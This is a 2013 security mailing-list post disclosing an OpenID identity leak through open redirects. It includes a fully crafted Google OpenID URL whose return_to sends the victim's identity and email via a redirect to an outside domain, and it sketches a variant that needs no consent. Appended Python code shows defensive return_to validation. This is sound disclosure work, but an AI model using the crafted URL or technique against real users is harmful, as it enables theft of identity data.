[security] OpenID identity leaks
Andris Atteka
andris.atteka at gmail.com
Sat Dec 21 09:12:05 UTC 2013
Hi Everyone,
Google's Security Team suggested asking this question here.
An attacker can perform the following steps:
1) Find an open redirect in some major website that leads to the attacker's
website (and append a fragment identifier to this URL)
2) Craft a URL and set redirect_url to the open redirect
3) Trick the victim into visiting the URL
As the URL belongs to a major website, most likely the victim will accept the
RP and his identity will be leaked to the attacker's site.
Here's an example (Google itself has some nice open redirects):
https://www.google.com/accounts/o8/ud?openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ext0.mode=fetch_request&openid.ext0.required=email&openid.ext0.type.email=http%3A%2F%2Faxschema.org%2Fcontact%2Femail&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.ns.ext0=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ns.ui=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fui%2F1.0&openid.realm=https%3A%2F%2Fwww.google.com%2F&openid.return_to=https%3A%2F%2Fwww.google.com%2Fsearch%3FbtnI%26q%3Dallinurl%253A%252F%252Flva.lv%23aaa&openid.ui.icon=true&openid.ui.lang=en-US&openid.ui.mode=popup&third_party_login=false
This can even be extended so that the user doesn't have to accept the RP. For this
the attacker would have to find an open redirect that shares a domain with some
valid OpenID consumer (some major sites actually do this). In this case the
user wouldn't even notice the identity leak.
Is this only a bug in Google's OpenID implementation or a bug in the OpenID
spec itself?
I do see the OpenID spec talking about normalization of identifiers
(including removal of fragment and fragment identifier). Does the same
apply to redirect_url? If not, would it be reasonable to include this in
the spec?
Regards,
Andris Atteka
andrisatteka.blogspot.com
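As an added illustration (my own example code, not the OpenID spec's reference code nor any provider's implementation), here is what an OP-side check of openid.return_to looks like: the realm matching rule from OpenID Authentication 2.0 section 9.2, a rejection of fragments, and an optional allowlist of the RP's registered return endpoints (as an OP would learn them from RP discovery, section 9.2.1). It runs against the return_to decoded from the URL in the message above; the registered endpoint and the rp.example host are constructed placeholders.

```python
from urllib.parse import urlsplit


def return_to_matches_realm(return_to: str, realm: str) -> bool:
    """Realm matching as described in OpenID Authentication 2.0, section 9.2.

    The realm may carry a "*." host wildcard and must not carry a fragment;
    a return_to carrying a fragment is rejected here as well, because the
    part after '#' is never sent to the server and only reaches the final
    page of a redirect chain."""
    rt, rl = urlsplit(return_to), urlsplit(realm)
    if rt.fragment or rl.fragment:
        return False
    if rt.scheme != rl.scheme or rt.port != rl.port:
        return False
    rt_host, rl_host = (rt.hostname or "").lower(), (rl.hostname or "").lower()
    if rl_host.startswith("*."):
        base = rl_host[2:]
        if rt_host != base and not rt_host.endswith("." + base):
            return False
    elif rt_host != rl_host:
        return False
    rt_path, rl_path = rt.path or "/", rl.path or "/"
    # the return_to path must equal the realm path or sit below it
    return rt_path == rl_path or rt_path.startswith(rl_path.rstrip("/") + "/")


def accept_return_to(return_to: str, realm: str, registered: tuple = ()) -> bool:
    """Realm match plus, when the RP's return endpoints are known, an exact
    scheme/host/path match against them (query string may vary). Realm
    matching alone cannot tell the RP's real endpoint from an open redirect
    on the same host, which is the leak described in the message."""
    if not return_to_matches_realm(return_to, realm):
        return False
    if not registered:
        return True
    rt = urlsplit(return_to)
    return any(
        (rt.scheme, rt.netloc, rt.path) == (r.scheme, r.netloc, r.path)
        for r in map(urlsplit, registered)
    )


def demo() -> dict:
    realm = "https://www.google.com/"
    # openid.return_to decoded from the URL quoted in the message above
    posted = "https://www.google.com/search?btnI&q=allinurl%3A%2F%2Flva.lv#aaa"
    no_fragment = posted.split("#")[0]
    registered = ("https://www.google.com/accounts/o8/return",)  # constructed placeholder
    return {
        "accepted_with_fragment": accept_return_to(posted, realm),
        "realm_match_without_fragment": return_to_matches_realm(no_fragment, realm),
        "accepted_against_allowlist": accept_return_to(no_fragment, realm, registered),
    }
```

The middle result is the point of the message: with the fragment stripped, realm matching accepts the redirect endpoint, so only the endpoint allowlist (or RP discovery) rejects it.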